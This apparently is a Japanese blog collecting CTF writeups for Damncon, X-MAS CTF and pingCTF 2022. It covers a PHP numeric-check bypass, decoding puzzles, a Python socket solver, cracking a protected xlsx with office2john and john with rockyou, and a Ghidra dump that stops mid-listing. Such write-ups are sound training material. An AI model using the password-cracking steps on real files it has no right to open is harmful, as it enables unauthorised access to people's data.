Damncon 2022 Writeup

CTF writeup

この大会は2022/12/22 0:00(JST)~2022/12/25 0:00(JST)に開催されました。
今回もチームで参戦。結果は134点で637チーム中91位でした。
自分で解けた問題をWriteupとして書いておきます。

Test - CTF (web)

$ curl https://test-ctf.dsphctf.repl.co/source.txt
<?php
require 'function.php';

$dev = $_GET['number'];
if (isset($dev)) {
	if (is_numeric($dev)){
		if (!strpos($dev, ".")){
			if (strlen($dev) > 6){
				if ($dev < 99999 && $dev > 90000)
				echo 'Flag:  '.'Damncon{FAKE_FLAGS}';
				else
				print '<div class="alert">Oh Oh Think again</div>';
			} else
				print '<h1>Wrong Move Champ</h1>';
		} else
		print '<h1>Not That hard . keep trying</h1>';	
	} else
		print '</h1>Just read the source code once again</h1>';
}
?>

例えば、numberに95000e0と指定すれば、$devは95000と同等なので、条件を満たす。
https://test-ctf.dsphctf.repl.co/?number=95000e0にアクセスすると、フラグが表示された。

DAMNCON{Q4L3URPGHJMA65C}

WELCOME CHALLENGE (general)

URLのidのパラメータの値で"%"が不足しているので、適宜"%"を入れる。

DAMNCON%25%25%25%25%25%25%25%25%7BWELCOM_2022%25%25%25%25%25%25%25%25%7D

これをCyberChefなどで、URLデコードする。

DAMNCON%%%%%%%%{WELCOM_2022%%%%%%%%}

"%"を削除するとフラグになった。

DAMNCON{WELCOM_2022}

Giffy (crypto)

アニメーションGIFが添付されている。
以下の順に数字が表示される。

144
141
155
156
143
157
156
173
147
151
146
137
143
162
141
143
153
145
144
175

8進数のASCIIコードとしてデコードする。

#!/usr/bin/env python3
codes = ['144', '141', '155', '156', '143', '157', '156', '173', '147', '151',
    '146', '137', '143', '162', '141', '143', '153', '145', '144', '175']

flag = ''
for code in codes:
    flag += chr(int(code, 8))
print(flag)

damncon{gif_cracked}

Webnux (web)

HTMLソースを見るが、何もない。読み込んでいるstatic/scripts.jsを見てみると、コメントにフラグが書いてあった。

const cdPrinter = () => {
    /* flag: damncon{shunux_web_cracked} */
    let cdDiv = document.createElement("p")
    cdDiv.innerHTML = "Ohh... You Hackoor? Sorry kid it's just a website not a machine"
    cdDiv.setAttribute("class", "ag output-row")
    siteContainer.insertBefore(cdDiv, currentTerminalDiv)
}

damncon{shunux_web_cracked}

X-MAS CTF 2022 Writeup

CTF writeup

この大会は2022/12/17 5:00(JST)~2022/12/22 5:00(JST)に開催されました。
今回もチームで参戦。結果は 83点で816チーム中163位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome to X-MAS (Misc)

問題にフラグが書いてあった。

X-MAS{W3lc0m3_7o_x-m4s2022}

Hop onto Discord (Misc)

Discordに入り、#generalチャネルのトピックを見ると、フラグが書いてあった。

X-MAS{D15c0rd_1s_s4nt4's_f4v0ur1t3_hub}

pingCTF 2022 Writeup

CTF writeup

この大会は2022/12/17 9:00(JST)~2022/12/19 9:00(JST)に開催されました。
今回もチームで参戦。結果は 700点で174チーム中27位でした。
自分で解けた問題をWriteupとして書いておきます。

welcome (misc)

Discordに入り、#rulesチャネルのトピックを見ると、以下が書いてある。

Are you here for the flag? :eyes:
try messaging our facebook bot.. Maybe it will tell you something...
Make sure to firstly read all the rules! :eyes:
PS: have you tried pinging for !flag?

FacebookメッセンジャーPING PGに"!flag"と入力、送信し、答えていくと、フラグが表示された。

ping{W3lc0m3_t0_p1ngCTF_2022!_3c08b6c9a06c7db}

guess what (misc)

PoWをクリアした後、課題が3つのパートに分かれている。
まず、Part1のコードを読み解く。

・strings: "A", "B"からi個(iが2から17までの問題)の順列、全種の配列
・indexToRemove: stringsの長さ未満のランダム整数
・removedString = strings[indexToRemove]
・stringsからremovedStringを削除
・stringsをシャッフル
・stringsの一覧を表示
 →削除されたremovedStringを答えればよい。

set関数で2つのリストのXORをとり、削除された文字列を抽出する。
次に、Part2のコードを読み解く。Part1との差は、辞書の差のみ。"AB"を"ABCD"にするだけでよい。
最後に、Part3のコードを読み解く。今度はping{}の中の順列、全種の配列の中から、フラグを削除している。これまでと同じようにして削除されたフラグを抽出し、ping{xxx}という形式に整形する。

#!/usr/bin/env python3
import socket
import re
import itertools
import hashlib

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

def solve_pow(prefix, result, unknown_count):
    possibilities = itertools.product('0123456789abcdef', repeat=unknown_count)
    for ans in possibilities:
        answer = ''.join(ans)
        if hashlib.sha256((prefix + answer).encode()).hexdigest() == result:
            return answer

intro_dictionary = 'AB'
mid_dictionary = 'ABCD'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('guess_what.ctf.knping.pl', 20000))

data = recvuntil(s, b'\n').rstrip()
print(data)
pattern = 'sha256\("(.+) \+ \?\?\?\?\?\?"\) == "(.+)"'
m = re.search(pattern, data)
prefix = m.group(1)
result = m.group(2)
unknown_count = 6
solution = solve_pow(prefix, result, unknown_count)
data = recvuntil(s, b'> ')
print(data + solution)
s.sendall(solution.encode() + b'\n')

for _ in range(3):
    data = recvuntil(s, b'\n').rstrip()
    print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

for i in range(2, 18):
    data = recvuntil(s, b'...\n').rstrip()
    print(data)

    removed_strings = []
    while True:
        data = recvuntil(s, b'\n').rstrip()
        print(data)
        if 'PRINTING' in data:
            break
        else:
            removed_strings.append(data)

    strings = ["".join(x)
        for x in itertools.product(intro_dictionary, repeat=i)]
    removedString = list(set(removed_strings) ^ set(strings))[0]

    data = recvuntil(s, b'\n').rstrip()
    print(data)
    data = recvuntil(s, b'> ')
    print(data + removedString)
    s.sendall(removedString.encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)

for _ in range(4):
    data = recvuntil(s, b'\n').rstrip()
    print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

for i in range(2, 6):
    data = recvuntil(s, b'...\n').rstrip()
    print(data)

    removed_strings = []
    while True:
        data = recvuntil(s, b'\n').rstrip()
        print(data)
        if 'PRINTING' in data:
            break
        else:
            removed_strings.append(data)

    strings = ["".join(x)
        for x in itertools.product(mid_dictionary, repeat=6)]
    removedString = list(set(removed_strings) ^ set(strings))[0]

    data = recvuntil(s, b'\n').rstrip()
    print(data)
    data = recvuntil(s, b'> ')
    print(data + removedString)
    s.sendall(removedString.encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)

data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'...')
print(data)
s.sendall(b'\n')

data = recvuntil(s, b'...\n').rstrip()
print(data)

removed_flags = []
while True:
    data = recvuntil(s, b'\n').rstrip()
    #print(data)
    if 'PRINTING' in data:
        break
    else:
        removed_flags.append(data)

flags = ["".join(x) for x in itertools.permutations(removed_flags[-1])]
real_flag = list(set(removed_flags) ^ set(flags))[0]
flag = 'ping{%s}' % real_flag

data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'> ')
print(data + flag)
s.sendall(flag.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)

実行結果は以下の通り。

sha256("3eb7fe0d1d480a7d12d04043612cd9e536 + ??????") == "2c8e6e6c38cee110fb9d1718e7eced8485a136888585fbf9d5883525bc748289"
> 409e29
Hi, this is my game :)
I will give you some sTrInGs, and you will have to tell me, which one is missing, seems easy, right? :D
Let's try it out!
Press enter to continue...
PRINTING...
BA
AA
AB
DONE PRINTING
Which one is missing?
> BB
Correct!
PRINTING...
ABB
BAA
AAA
BAB
ABA
BBB
BBA
DONE PRINTING
Which one is missing?
> AAB
Correct!
    :
    :
You are doing great! Now, let's try something harder!
I will give you AGAIN some StRiNgS, and you will have to tell me, which one is missing, seems still doable, right? :D
But I need you to hurry this time, so you will have to guess the missing string in 5 seconds.
Let's try it out!
Press enter to continue...
PRINTING...
ADDADA
DCCCCB
BBBAAA
AADBCA
DDCCAD
    :
    :
Ok. This is kinda spooky. This time I will show you that I know everything, and you will have to prove me wrong in order to get the flag.
Press enter to continue...
PRINTING...
If you are so smart, then you should be able to give the flag in 15 seconds!
> ping{4nF8ai2e9d}
Correct! Here is your flag: ping{4nF8ai2e9d}
ping{4nF8ai2e9d}

high school grades (misc)

xlsxファイルだが、パスワードがかかっている。

$ office2john HS_Grades_December_2022.xlsx > hash.txt
$ john --wordlist=dict/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567          (HS_Grades_December_2022.xlsx)
1g 0:00:00:00 DONE (2022-12-17 12:20) 6.250g/s 100.0p/s 100.0c/s 100.0C/s 123456..jessica
Use the "--show" option to display all of the cracked passwords reliably
Session completed

パスワード"1234567"でExcelファイルを開く。Grades_December_2022シートの以下の2つのセルに以下のように書いてある。

D9: ApnL3omr,ih?
E9: AigssatrgtO3

L3とO3には"{"と"}"が書いてあるので、"A"を削除し、置き換える。

D9: pn{omr,ih?
E9: igssatrgt}

交互につなげていくと、フラグになる。

ping{sosmart,right?}

baby rev (rev)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  char cVar1;
  long in_FS_OFFSET;
  undefined local_78 [104];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Hi! I\'m baby rev!");
  puts("I\'m a baby reverse engineering challenge!");
  puts("I\'m not very good at reversing, but I\'m trying my best!");
  puts("Can you help me?");
  puts("Please tell me the first flag!");
  printf("Input: ");
  __isoc99_scanf(&DAT_001020c7,local_78);
  cVar1 = checkflag(local_78);
  if (cVar1 == '\0') {
    puts("Incorrect! :(( But definitely try next time!!!!");
  }
  else {
    puts("Correct! :) So happy for you!!!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

undefined8 checkflag(char *param_1)

{
  bool bVar1;
  undefined8 uVar2;
  long in_FS_OFFSET;
  int local_40;
  int local_3c;
  char acStack56 [40];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  if ((((*param_1 == 'p') && (param_1[1] == 'i')) && (param_1[2] == 'n')) &&
     (((param_1[3] == 'g' && (param_1[4] == '{')) && (param_1[0x25] == '}')))) {
    bVar1 = true;
  }
  else {
    bVar1 = false;
  }
  if (bVar1) {
    for (local_40 = 0; local_40 < 0x20; local_40 = local_40 + 1) {
      acStack56[local_40] = param_1[(long)local_40 + 5];
    }
    for (local_3c = 0; local_3c < 0x99; local_3c = local_3c + 1) {
      if ((*(uint *)(&KEYS + (long)(local_3c % 0xe) * 4) ^ (int)acStack56[local_3c % 0x1f]) * 4 +
          local_3c * 2 != *(int *)(FLAG + (long)local_3c * 4)) {
        uVar2 = 0;
        goto LAB_00101336;
      }
    }
    uVar2 = 1;
  }
  else {
    uVar2 = 0;
  }
LAB_00101336:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar2;
}

                             KEYS                                            XREF[3]:     Entry Point(*), 
                                                                                          checkflag:001012e3(*), 
                                                                                          checkflag:001012ea(R)  
        00104020 01              ??         01h
        00104021 00              ??         00h
        00104022 00              ??         00h
        00104023 00              ??         00h
        00104024 03              ??         03h
        00104025 00              ??         00h
        00104026 00              ??         00h
        00104027 00              ??         00h
        00104028 03              ??         03h
        00104029 00              ??         00h
        0010402a 00              ??         00h
        0010402b 00              ??         00h
        0010402c 07              ??         07h
        0010402d 00              ??         00h
        0010402e 00              ??         00h
        0010402f 00              ??         00h
        00104030 50 00 00        unicode32  U"PING ROCKS"
                 00 49 00 
                 00 00 4e 
        0010405c 00              ??         00h
        0010405d 00              ??         00h
        0010405e 00              ??         00h
        0010405f 00              ??         00h

                             FLAG                                            XREF[3]:     Entry Point(*), 
                                                                                          checkflag:0010130b(*), 
                                                                                          checkflag:00101312(R)  
        00104060 cc 01 00        undefine
                 00 c2 00 
                 00 00 d8 
           00104060 cc              undefined1CCh                     [0]                               XREF[3]:     Entry Point(*), 
                                                                                                                     checkflag:0010130b(*), 
                                                                                                                     checkflag:00101312(R)  
           00104061 01              undefined101h                     [1]
           00104062 00              undefined100h                     [2]
           00104063 00              undefined100h                     [3]
           00104064 c2              undefined1C2h                     [4]
           00104065 00              undefined100h                     [5]
           00104066 00              undefined100h                     [6]
           00104067 00              undefined100h                     [7]
           00104068 d8              undefined1D8h                     [8]
           00104069 01              undefined101h                     [9]
           0010406a 00              undefined100h                     [10]
           0010406b 00              undefined100h                     [11]
           0010406c d6              undefined1D6h                     [12]
           0010406d 00              undefined100h                     [13]
           0010406e 00              undefined100h                     [14]
           0010406f 00              undefined100h                     [15]
           00104070 90              undefined190h                     [16]
           00104071 00              undefined100h                     [17]
           00104072 00              undefined100h                     [18]
           00104073 00              undefined100h                     [19]
           00104074 f2              undefined1F2h                     [20]
           00104075 00              undefined100h                     [21]
           00104076 00              undefined100h                     [22]
           00104077 00              undefined100h                     [23]
           00104078 08              undefined108h                     [24]
           00104079 02              undefined102h                     [25]
           0010407a 00              undefined100h                     [26]
           0010407b 00              undefined100h                     [27]
           0010407c b2              undefined1B2h                     [28]
           0010407d 00              undefined100h                     [29]
           0010407e 00              undefined100h                     [30]
           0010407f 00              undefined100h                     [31]
           00104080 2c              undefined12Ch                     [32]
           00104081 01              undefined101h                     [33]
           00104082 00              undefined100h                     [34]
           00104083 00              undefined100h                     [35]
           00104084 46              undefined146h                     [36]
           00104085 00              undefined100h                     [37]
           00104086 00              undefined100h                     [38]
           00104087 00              undefined100h                     [39]
           00104088 c4              undefined1C4h                     [40]
           00104089 00              undefined100h                     [41]
           0010408a 00              undefined100h                     [42]
           0010408b 00              undefined100h                     [43]
           0010408c f2              undefined1F2h                     [44]
           0010408d 01              undefined101h                     [45]
           0010408e 00              undefined100h                     [46]
           0010408f 00              undefined100h                     [47]
           00104090 ac              undefined1ACh                     [48]
           00104091 00              undefined100h                     [49]
           00104092 00              undefined100h                     [50]
           00104093 00              undefined100h                     [51]
           00104094 4a              undefined14Ah                     [52]
           00104095 00              undefined100h                     [53]
           00104096 00              undefined100h                     [54]
           00104097 00              undefined100h                     [55]
           00104098 a8              undefined1A8h                     [56]
           00104099 01              undefined101h                     [57]
           0010409a 00              undefined100h                     [58]
           0010409b 00              undefined100h                     [59]
           0010409c de              undefined1DEh                     [60]
           0010409d 00              undefined100h                     [61]
           0010409e 00              undefined100h                     [62]
           0010409f 00              undefined100h                     [63]
           001040a0 90              undefined190h                     [64]
           001040a1 01              undefined101h                     [65]
           001040a2 00              undefined100h                     [66]
           001040a3 00              undefined100h                     [67]
           001040a4 72              undefined172h                     [68]
           001040a5 01              undefined101h                     [69]
           001040a6 00              undefined100h                     [70]
           001040a7 00              undefined100h                     [71]
           001040a8 a4              undefined1A4h                     [72]
           001040a9 01              undefined101h                     [73]
           001040aa 00              undefined100h                     [74]
           001040ab 00              undefined100h                     [75]
           001040ac 7e              undefined17Eh                     [76]
           001040ad 00              undefined100h                     [77]
           001040ae 00              undefined100h                     [78]
           001040af 00              undefined100h                     [79]
           001040b0 b4              undefined1B4h                     [80]
           001040b1 00              undefined100h                     [81]
           001040b2 00              undefined100h                     [82]
           001040b3 00              undefined100h                     [83]
           001040b4 f2              undefined1F2h                     [84]
           001040b5 00              undefined100h                     [85]
           001040b6 00              undefined100h                     [86]
           001040b7 00              undefined100h                     [87]
           001040b8 b8              undefined1B8h                     [88]
           001040b9 01              undefined101h                     [89]
           001040ba 00              undefined100h                     [90]
           001040bb 00              undefined100h                     [91]
           001040bc 96              undefined196h                     [92]
           001040bd 00              undefined100h                     [93]
           001040be 00              undefined100h                     [94]
           001040bf 00              undefined100h                     [95]
           001040c0 70              undefined170h                     [96]
           001040c1 00              undefined100h                     [97]
           001040c2 00              undefined100h                     [98]
           001040c3 00              undefined100h                     [99]
           001040c4 46              undefined146h                     [100]
           001040c5 00              undefined100h                     [101]
           001040c6 00              undefined100h                     [102]
           001040c7 00              undefined100h                     [103]
           001040c8 ac              undefined1ACh                     [104]
           001040c9 00              undefined100h                     [105]
           001040ca 00              undefined100h                     [106]
           001040cb 00              undefined100h                     [107]
           001040cc aa              undefined1AAh                     [108]
           001040cd 00              undefined100h                     [109]
           001040ce 00              undefined100h                     [110]
           001040cf 00              undefined100h                     [111]
           001040d0 b8              undefined1B8h                     [112]
           001040d1 00              undefined100h                     [113]
           001040d2 00              undefined100h                     [114]
           001040d3 00              undefined100h                     [115]
           001040d4 c2              undefined1C2h                     [116]
           001040d5 00              undefined100h                     [117]
           001040d6 00              undefined100h                     [118]
           001040d7 00              undefined100h                     [119]
           001040d8 c4              undefined1C4h                     [120]
           001040d9 00              undefined100h                     [121]
           001040da 00              undefined100h                     [122]
           001040db 00              undefined100h                     [123]
           001040dc 12              undefined112h                     [124]
           001040dd 02              undefined102h                     [125]
           001040de 00              undefined100h                     [126]
           001040df 00              undefined100h                     [127]
           001040e0 cc              undefined1CCh                     [128]
           001040e1 01              undefined101h                     [129]
           001040e2 00              undefined100h                     [130]
           001040e3 00              undefined100h                     [131]
           001040e4 3e              undefined13Eh                     [132]
           001040e5 01              undefined101h                     [133]
           001040e6 00              undefined100h                     [134]
           001040e7 00              undefined100h                     [135]
           001040e8 38              undefined138h                     [136]
           001040e9 02              undefined102h                     [137]
           001040ea 00              undefined100h                     [138]
           001040eb 00              undefined100h                     [139]
           001040ec 1a              undefined11Ah                     [140]
           001040ed 01              undefined101h                     [141]
           001040ee 00              undefined100h                     [142]
           001040ef 00              undefined100h                     [143]
           001040f0 94              undefined194h                     [144]
           001040f1 01              undefined101h                     [145]
           001040f2 00              undefined100h                     [146]
           001040f3 00              undefined100h                     [147]
           001040f4 d6              undefined1D6h                     [148]
           001040f5 01              undefined101h                     [149]
           001040f6 00              undefined100h                     [150]
           001040f7 00              undefined100h                     [151]
           001040f8 d0              undefined1D0h                     [152]
           001040f9 00              undefined100h                     [153]
           001040fa 00              undefined100h                     [154]
           001040fb 00              undefined100h                     [155]
           001040fc de              undefined1DEh                     [156]
           001040fd 00              undefined100h                     [157]
           001040fe 00              undefined100h                     [158]
           001040ff 00              undefined100h                     [159]
           00104100 a0              undefined1A0h                     [160]
           00104101 00              undefined100h                     [161]
           00104102 00              undefined100h                     [162]
           00104103 00              undefined100h                     [163]
           00104104 12              undefined112h                     [164]
           00104105 01              undefined101h                     [165]
           00104106 00              undefined100h                     [166]
           00104107 00              undefined100h                     [167]
           00104108 28              undefined128h                     [168]
           00104109 01              undefined101h                     [169]
           0010410a 00              undefined100h                     [170]
           0010410b 00              undefined100h                     [171]
           0010410c 0a              undefined10Ah                     [172]
           0010410d 02              undefined102h                     [173]
           0010410e 00              undefined100h                     [174]
           0010410f 00              undefined100h                     [175]
           00104110 c8              undefined1C8h                     [176]
           00104111 01              undefined101h                     [177]
           00104112 00              undefined100h                     [178]
           00104113 00              undefined100h                     [179]
           00104114 ee              undefined1EEh                     [180]
           00104115 01              undefined101h                     [181]
           00104116 00              undefined100h                     [182]
           00104117 00              undefined100h                     [183]
           00104118 e8              undefined1E8h                     [184]
           00104119 01              undefined101h                     [185]
           0010411a 00              undefined100h                     [186]
           0010411b 00              undefined100h                     [187]
           0010411c b6              undefined1B6h                     [188]
           0010411d 00              undefined100h                     [189]
           0010411e 00              undefined100h                     [190]
           0010411f 00              undefined100h                     [191]
           00104120 d4              undefined1D4h                     [192]
           00104121 00              undefined100h                     [193]
           00104122 00              undefined100h                     [194]
           00104123 00              undefined100h                     [195]
           00104124 3e              undefined13Eh                     [196]
           00104125 02              undefined102h                     [197]
           00104126 00              undefined100h                     [198]
           00104127 00              undefined100h                     [199]
           00104128 60              undefined160h                     [200]
           00104129 02              undefined102h                     [201]
           0010412a 00              undefined100h                     [202]
           0010412b 00              undefined100h                     [203]
           0010412c 62              undefined162h                     [204]
           0010412d 01              undefined101h                     [205]
           0010412e 00              undefined100h                     [206]
           0010412f 00              undefined100h                     [207]
           00104130 50              undefined150h                     [208]
           00104131 01              undefined101h                     [209]
           00104132 00              undefined100h                     [210]
           00104133 00              undefined100h                     [211]
           00104134 6a              undefined16Ah                     [212]
           00104135 00              undefined100h                     [213]
           00104136 00              undefined100h                     [214]
           00104137 00              undefined100h                     [215]
           00104138 78              undefined178h                     [216]
           00104139 00              undefined100h                     [217]
           0010413a 00              undefined100h                     [218]
           0010413b 00              undefined100h                     [219]
           0010413c 9e              undefined19Eh                     [220]
           0010413d 00              undefined100h                     [221]
           0010413e 00              undefined100h                     [222]
           0010413f 00              undefined100h                     [223]
           00104140 8c              undefined18Ch                     [224]
           00104141 01              undefined101h                     [225]
           00104142 00              undefined100h                     [226]
           00104143 00              undefined100h                     [227]
           00104144 ca              undefined1CAh                     [228]
           00104145 01              undefined101h                     [229]
           00104146 00              undefined100h                     [230]
           00104147 00              undefined100h                     [231]
           00104148 a8              undefined1A8h                     [232]
           00104149 01              undefined101h                     [233]
           0010414a 00              undefined100h                     [234]
           0010414b 00              undefined100h                     [235]
           0010414c 0e              undefined10Eh                     [236]
           0010414d 01              undefined101h                     [237]
           0010414e 00              undefined100h                     [238]
           0010414f 00              undefined100h                     [239]
           00104150 3c              undefined13Ch                     [240]
           00104151 02              undefined102h                     [241]
           00104152 00              undefined100h                     [242]
           00104153 00              undefined100h                     [243]
           00104154 1a              undefined11Ah                     [244]
           00104155 02              undefined102h                     [245]
           00104156 00              undefined100h                     [246]
           00104157 00              undefined100h                     [247]
           00104158 6c              undefined16Ch                     [248]
           00104159 01              undefined101h                     [249]
           0010415a 00              undefined100h                     [250]
           0010415b 00              undefined100h                     [251]
           0010415c 4e              undefined14Eh                     [252]
           0010415d 02              undefined102h                     [253]
           0010415e 00              undefined100h                     [254]
           0010415f 00              undefined100h                     [255]
           00104160 d8              undefined1D8h                     [256]
           00104161 01              undefined101h                     [257]
           00104162 00              undefined100h                     [258]
           00104163 00              undefined100h                     [259]
           00104164 06              undefined106h                     [260]
           00104165 02              undefined102h                     [261]
           00104166 00              undefined100h                     [262]
           00104167 00              undefined100h                     [263]
           00104168 78              undefined178h                     [264]
           00104169 01              undefined101h                     [265]
           0010416a 00              undefined100h                     [266]
           0010416b 00              undefined100h                     [267]
           0010416c 46              undefined146h                     [268]
           0010416d 01              undefined101h                     [269]
           0010416e 00              undefined100h                     [270]
           0010416f 00              undefined100h                     [271]
           00104170 70              undefined170h                     [272]
           00104171 02              undefined102h                     [273]
           00104172 00              undefined100h                     [274]
           00104173 00              undefined100h                     [275]
           00104174 7e              undefined17Eh                     [276]
           00104175 01              undefined101h                     [277]
           00104176 00              undefined100h                     [278]
           00104177 00              undefined100h                     [279]
           00104178 24              undefined124h                     [280]
           00104179 02              undefined102h                     [281]
           0010417a 00              undefined100h                     [282]
           0010417b 00              undefined100h                     [283]
           0010417c fe              undefined1FEh                     [284]
           0010417d 01              undefined101h                     [285]
           0010417e 00              undefined100h                     [286]
           0010417f 00              undefined100h                     [287]
           00104180 10              undefined110h                     [288]
           00104181 02              undefined102h                     [289]
           00104182 00              undefined100h                     [290]
           00104183 00              undefined100h                     [291]
           00104184 5e              undefined15Eh                     [292]
           00104185 01              undefined101h                     [293]
           00104186 00              undefined100h                     [294]
           00104187 00              undefined100h                     [295]
           00104188 8c              undefined18Ch                     [296]
           00104189 01              undefined101h                     [297]
           0010418a 00              undefined100h                     [298]
           0010418b 00              undefined100h                     [299]
           0010418c ee              undefined1EEh                     [300]
           0010418d 00              undefined100h                     [301]
           0010418e 00              undefined100h                     [302]
           0010418f 00              undefined100h                     [303]
           00104190 48              undefined148h                     [304]
           00104191 01              undefined101h                     [305]
           00104192 00              undefined100h                     [306]
           00104193 00              undefined100h                     [307]
           00104194 6a              undefined16Ah                     [308]
           00104195 02              undefined102h                     [309]
           00104196 00              undefined100h                     [310]
           00104197 00              undefined100h                     [311]
           00104198 98              undefined198h                     [312]
           00104199 02              undefined102h                     [313]
           0010419a 00              undefined100h                     [314]
           0010419b 00              undefined100h                     [315]
           0010419c a2              undefined1A2h                     [316]
           0010419d 00              undefined100h                     [317]
           0010419e 00              undefined100h                     [318]
           0010419f 00              undefined100h                     [319]
           001041a0 9c              undefined19Ch                     [320]
           001041a1 02              undefined102h                     [321]
           001041a2 00              undefined100h                     [322]
           001041a3 00              undefined100h                     [323]
           001041a4 12              undefined112h                     [324]
           001041a5 01              undefined101h                     [325]
           001041a6 00              undefined100h                     [326]
           001041a7 00              undefined100h                     [327]
           001041a8 3c              undefined13Ch                     [328]
           001041a9 01              undefined101h                     [329]
           001041aa 00              undefined100h                     [330]
           001041ab 00              undefined100h                     [331]
           001041ac 3e              undefined13Eh                     [332]
           001041ad 01              undefined101h                     [333]
           001041ae 00              undefined100h                     [334]
           001041af 00              undefined100h                     [335]
           001041b0 b0              undefined1B0h                     [336]
           001041b1 01              undefined101h                     [337]
           001041b2 00              undefined100h                     [338]
           001041b3 00              undefined100h                     [339]
           001041b4 d6              undefined1D6h                     [340]
           001041b5 01              undefined101h                     [341]
           001041b6 00              undefined100h                     [342]
           001041b7 00              undefined100h                     [343]
           001041b8 1c              undefined11Ch                     [344]
           001041b9 02              undefined102h                     [345]
           001041ba 00              undefined100h                     [346]
           001041bb 00              undefined100h                     [347]
           001041bc b2              undefined1B2h                     [348]
           001041bd 01              undefined101h                     [349]
           001041be 00              undefined100h                     [350]
           001041bf 00              undefined100h                     [351]
           001041c0 c4              undefined1C4h                     [352]
           001041c1 00              undefined100h                     [353]
           001041c2 00              undefined100h                     [354]
           001041c3 00              undefined100h                     [355]
           001041c4 ce              undefined1CEh                     [356]
           001041c5 00              undefined100h                     [357]
           001041c6 00              undefined100h                     [358]
           001041c7 00              undefined100h                     [359]
           001041c8 70              undefined170h                     [360]
           001041c9 02              undefined102h                     [361]
           001041ca 00              undefined100h                     [362]
           001041cb 00              undefined100h                     [363]
           001041cc 4e              undefined14Eh                     [364]
           001041cd 02              undefined102h                     [365]
           001041ce 00              undefined100h                     [366]
           001041cf 00              undefined100h                     [367]
           001041d0 bc              undefined1BCh                     [368]
           001041d1 00              undefined100h                     [369]
           001041d2 00              undefined100h                     [370]
           001041d3 00              undefined100h                     [371]
           001041d4 3a              undefined13Ah                     [372]
           001041d5 01              undefined101h                     [373]
           001041d6 00              undefined100h                     [374]
           001041d7 00              undefined100h                     [375]
           001041d8 ac              undefined1ACh                     [376]
           001041d9 02              undefined102h                     [377]
           001041da 00              undefined100h                     [378]
           001041db 00              undefined100h                     [379]
           001041dc 92              undefined192h                     [380]
           001041dd 01              undefined101h                     [381]
           001041de 00              undefined100h                     [382]
           001041df 00              undefined100h                     [383]
           001041e0 a0              undefined1A0h                     [384]
           001041e1 02              undefined102h                     [385]
           001041e2 00              undefined100h                     [386]
           001041e3 00              undefined100h                     [387]
           001041e4 46              undefined146h                     [388]
           001041e5 01              undefined101h                     [389]
           001041e6 00              undefined100h                     [390]
           001041e7 00              undefined100h                     [391]
           001041e8 8c              undefined18Ch                     [392]
           001041e9 02              undefined102h                     [393]
           001041ea 00              undefined100h                     [394]
           001041eb 00              undefined100h                     [395]
           001041ec 8e              undefined18Eh                     [396]
           001041ed 01              undefined101h                     [397]
           001041ee 00              undefined100h                     [398]
           001041ef 00              undefined100h                     [399]
           001041f0 7c              undefined17Ch                     [400]
           001041f1 02              undefined102h                     [401]
           001041f2 00              undefined100h                     [402]
           001041f3 00              undefined100h                     [403]
           001041f4 4a              undefined14Ah                     [404]
           001041f5 02              undefined102h                     [405]
           001041f6 00              undefined100h                     [406]
           001041f7 00              undefined100h                     [407]
           001041f8 08              undefined108h                     [408]
           001041f9 01              undefined101h                     [409]
           001041fa 00              undefined100h                     [410]
           001041fb 00              undefined100h                     [411]
           001041fc 76              undefined176h                     [412]
           001041fd 01              undefined101h                     [413]
           001041fe 00              undefined100h                     [414]
           001041ff 00              undefined100h                     [415]
           00104200 b8              undefined1B8h                     [416]
           00104201 02              undefined102h                     [417]
           00104202 00              undefined100h                     [418]
           00104203 00              undefined100h                     [419]
           00104204 76              undefined176h                     [420]
           00104205 01              undefined101h                     [421]
           00104206 00              undefined100h                     [422]
           00104207 00              undefined100h                     [423]
           00104208 d0              undefined1D0h                     [424]
           00104209 02              undefined102h                     [425]
           0010420a 00              undefined100h                     [426]
           0010420b 00              undefined100h                     [427]
           0010420c 96              undefined196h                     [428]
           0010420d 01              undefined101h                     [429]
           0010420e 00              undefined100h                     [430]
           0010420f 00              undefined100h                     [431]
           00104210 c8              undefined1C8h                     [432]
           00104211 02              undefined102h                     [433]
           00104212 00              undefined100h                     [434]
           00104213 00              undefined100h                     [435]
           00104214 4a              undefined14Ah                     [436]
           00104215 01              undefined101h                     [437]
           00104216 00              undefined100h                     [438]
           00104217 00              undefined100h                     [439]
           00104218 3c              undefined13Ch                     [440]
           00104219 01              undefined101h                     [441]
           0010421a 00              undefined100h                     [442]
           0010421b 00              undefined100h                     [443]
           0010421c 6a              undefined16Ah                     [444]
           0010421d 02              undefined102h                     [445]
           0010421e 00              undefined100h                     [446]
           0010421f 00              undefined100h                     [447]
           00104220 58              undefined158h                     [448]
           00104221 02              undefined102h                     [449]
           00104222 00              undefined100h                     [450]
           00104223 00              undefined100h                     [451]
           00104224 9a              undefined19Ah                     [452]
           00104225 02              undefined102h                     [453]
           00104226 00              undefined100h                     [454]
           00104227 00              undefined100h                     [455]
           00104228 bc              undefined1BCh                     [456]
           00104229 02              undefined102h                     [457]
           0010422a 00              undefined100h                     [458]
           0010422b 00              undefined100h                     [459]
           0010422c f6              undefined1F6h                     [460]
